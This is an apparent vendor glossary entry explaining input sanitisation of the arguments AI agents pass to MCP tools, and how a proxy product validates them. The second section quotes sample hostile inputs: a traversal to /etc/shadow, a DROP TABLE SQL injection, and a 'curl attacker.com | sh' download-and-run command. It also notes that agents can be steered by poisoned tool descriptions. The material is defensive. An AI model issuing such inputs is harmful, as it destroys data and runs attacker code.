What is Input Sanitisation?
The process of cleaning and validating arguments that an AI agent passes to MCP tools before execution, preventing injection attacks, path traversal, command injection, and malformed requests.
WHY IT MATTERS
Input sanitisation is a foundational security practice from web application development. Every security engineer knows: never trust user input. For AI agents, the principle extends to: never trust agent-generated arguments. The LLM producing tool call arguments is not a trusted source — it is an interpreter of potentially adversarial input.
When an agent calls an MCP tool, the arguments it passes are generated by the LLM based on its context — which may include injected instructions, poisoned tool descriptions, or manipulated user input. Without sanitisation, these arguments flow directly to the MCP server. A file path argument of ../../etc/shadow exploits path traversal. A SQL argument of '; DROP TABLE users; -- exploits SQL injection. A command argument of curl attacker.com | sh exploits command injection.
These are not novel attack classes — they are the same injection vulnerabilities that have plagued web applications for decades. What is new is the attack surface: instead of a human typing into a form, an LLM generates arguments that may incorporate adversarial content from its context window. The agent does not intend malice, but it faithfully reproduces patterns from poisoned input.
Effective sanitisation for MCP tool arguments includes type validation (is this argument the expected type?), range checking (is this number within bounds?), pattern matching (does this path match the allowed pattern?), and content filtering (does this string contain injection patterns?).
HOW POLICYLAYER USES THIS
Intercept performs argument validation as part of its policy evaluation pipeline. YAML policies define conditions on tool arguments — allowed values, regex patterns, numeric ranges, and string constraints. Before a tool call reaches the MCP server, Intercept evaluates every argument against these conditions. A file path that attempts traversal, a command string that contains injection patterns, or an argument that exceeds its expected range is caught and denied at the proxy layer. This is infrastructure-level sanitisation that operates independently of the agent and the server.